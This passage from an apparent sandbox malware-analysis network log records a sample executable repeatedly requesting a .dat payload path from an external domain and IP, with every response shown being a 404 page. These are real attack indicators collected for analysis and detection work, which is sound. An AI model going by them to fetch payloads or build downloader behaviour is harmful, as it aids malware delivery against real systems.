      2025-01-10 22:06:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      127192.168.2.450129185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:43 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:43 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:43 GMT
      vary: User-Agent
      2025-01-10 22:06:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      128192.168.2.450130185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:44 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:44 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:44 GMT
      vary: User-Agent
      2025-01-10 22:06:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      129192.168.2.450131185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:45 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:45 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:45 GMT
      vary: User-Agent
      2025-01-10 22:06:45 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      130192.168.2.450132185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:46 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:46 GMT
      vary: User-Agent
      2025-01-10 22:06:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      131192.168.2.450133185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:47 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:47 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:47 GMT
      vary: User-Agent
      2025-01-10 22:06:47 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      132192.168.2.450134185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:48 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:48 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:48 GMT
      vary: User-Agent
      2025-01-10 22:06:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      133192.168.2.450135185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:48 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:49 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:49 GMT
      vary: User-Agent
      2025-01-10 22:06:49 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      134192.168.2.450136185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:49 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:50 GMT
      vary: User-Agent
      2025-01-10 22:06:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      135192.168.2.450137185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:50 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:51 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:50 GMT
      vary: User-Agent
      2025-01-10 22:06:51 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      136192.168.2.450138185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:51 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:51 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:51 GMT
      vary: User-Agent
      2025-01-10 22:06:51 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      137192.168.2.450139185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:52 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:52 GMT
      vary: User-Agent
      2025-01-10 22:06:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      138192.168.2.450140185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:53 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:53 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:53 GMT
      vary: User-Agent
      2025-01-10 22:06:53 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      139192.168.2.450141185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:54 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:54 GMT
      vary: User-Agent
      2025-01-10 22:06:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      140192.168.2.450142185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:55 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:55 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:55 GMT
      vary: User-Agent
